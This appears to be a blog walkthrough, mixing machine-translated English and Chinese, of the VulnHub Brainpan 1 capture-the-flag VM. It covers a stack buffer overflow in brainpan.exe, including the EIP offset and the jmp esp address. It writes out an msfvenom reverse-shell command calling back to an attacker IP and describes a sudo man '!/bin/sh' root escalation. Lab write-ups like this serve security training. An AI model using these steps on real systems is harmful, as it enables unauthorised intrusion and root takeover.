**
VulnHub-Brainpan: 1-Walkthrough
**
Drone address: https: //www.vulnhub.com/entry/brainpan-1,51/
drone Difficulty: Intermediate (CTF)
drone Release Date: March 20, 2013
drone Description: By using this virtual machine , you Agree that in NO Event Will the I BE LIABLE
for the any Loss or Damage Including the without Limitation, the INDIRECT or
the consequential Loss or Damage, or the any Loss or Damage WHATSOEVER ARISING
from Loss of Data or Profits ARISING OUT of or in Connection with The use
of this software.
objective: to get root access & find four flag.txt
author: Dayu
time: 2020-01-13
Note: For all these computers, I've downloaded using a computer running VMware. I will use Kali Linux as a solution to the attacker's machine the CTF. Here the use of technology for learning for educational purposes only, if the technology is listed for any other goal, I will not be responsible.
First, information collection
We need to identify targets in the VM's IP address, use nmap to obtain the destination IP address:
We've found the CTF target computer IP address: 192.168.182.152
opened 9999 and 10,000 port ...
this and not in front of several Like ...
first port 9999 to try
to deny access password ... no ... no way trying to port 10000, right
in front of nmap port 10000 to have information http service
here mainly on security-coded Veracode infographic, we found OWASP ranking in Web applications the top 10 vulnerabilities, etc., currently do not see useful information ...
find / bin directory, find specific HTTP server and Python version ...
using wget to download brainpan.exe file and use the file command to check the file and found it to be a 32 bit Windows executable file
to execute the application on a Windows machine can see it is a network server, waiting for connections on port 9999, it is likely to find application is listening on that port ...
下面在本机上用immunity debugger打开brainpan.exe文件
运行它
现在创建一个简单的fuzzer python脚本,以发送字符串来尝试使程序崩溃…
然后在kali上输出到本地EXE文件中执行…
可以看到python脚本中的字符串成功发送,并且触发了访问冲突…
知道字符串会导致程序崩溃,我想确切地确定它崩溃的位置并覆盖EIP(在这种情况下,它是61616161,而ascii小写字母’a’是十六进制的,所以它表示aaaa),在python脚本有效负载中替换字符串,插入一串唯一的字符…
要创建一串唯一的字符,需要使用metasploit工具“ pattern-create”来创建一个唯一的1000个字符的字符串…
将其添加到脚本中作为有效负载…
继续输入
这次运行它时,确切地看到它崩溃的位置以及用来覆盖EIP的内容…
可以看到它用35724134覆盖了EIP
知道字符在1000个字符的字符串中的某个位置,需要确切的知道它…使用metasploit…
在524位置,调整下ptyhon脚本…
继续运行
看到EIP已被62626262(bbbb)覆盖了…
将最终用有效载荷中的c替换shellcode…
这边需要注意的是:确保增加区域的大小以容纳反向shell代码,需要将c的数量调整数值!!
右键单击ESP寄存器并选择“ follow in dump”,可以看到所有写入内存的’c’字符。起始地址是005FF910
向下滚动查看,可以看到写’c’的结束地址是005FFAE8
这边我写反了但是意思都知道…(尴尬) 472个C
如果这里不够字符来写shellcode,那得用到fuzzysecurity!
这边472个已经够了…
现在需要检查包含在我的shellcode中的“坏字符”…我将使用不同字符的字符串…
这是一个生成所有字符的简单python脚本…
调整python脚本有效负载…
重新运行…
仔细查看了序列,看不到任何丢失的字符,可以使用所有字符(\ x00为空字节除外)
需要跳转到堆栈,就需要找到指令“ jmp esp”的地址…
311712F3…
将它添加到我的Python脚本中,以替换写入EIP的4个“ b”字符(反转需使用小端序格式:\ xF3 \ x12 \ x17 \ x31)
使用msfvenom创建我的反向shell有效负载…
命令:msfvenom -p linux/x86/shell_reverse_tcp -b “\x00” LHOST=192.168.182.149 LPORT=443 -f python
python中添加了一点小字节的反向jmp esp地址,16个nops(\ x90),然后是实际的shellcode…
首先在本地测试漏洞,方法是用wine启动brainpan.exe,然后启动服务,看到连接已建立!!
该漏洞利用程序是在靶机上工作的(192.168.182.152),继续测试…
成功通过缓冲区提权…
直接sudo提权,发现/home/anansi/bin/anansi_util…
继续sudo目录试试…
意思是可以选择一个执行,command告知我有命令能执行,试试
!进入到man目录…
该目录全是root权限执行的文件…(这里有太多提权的方法,shell我就不写了,发现已经凌晨2点了…)
记住,我已经以sudo(以root身份)运行了整个程序,然后如果我输入!/bin/sh,它将在此目录中运行一个shell… 以root身份运行!(记住这个方法,简单省力省时)
成功拿到root权限和flag…
花了一天的时间来理解缓冲区溢出,栈溢出,二进制,逆向分析!!!!没去接触前,真的很难,只要认真专研下来,理解原理,其实难度还是不大…(哈哈,站着说话不腰疼)
Commissioning and buffer overflow exploits write buffer overflow need to understand the basis of the principle of stack overflow, debugging method and the preparation of exp method, belonging to the degree of reverse analysis basis for comparison, but did not reverse analysis for the experience of a small partner still require careful study under, Come on.
Since we have been successful root privileges & find flag.txt, thus completing the simple drone, I hope you like this machine, please continue to focus on large there will be late more challenging than the machine, along with exercises to learn.
If you have other methods of welcome message. If there wrong place, you must tell me. If you find this blog to write good, welcome to share the people around.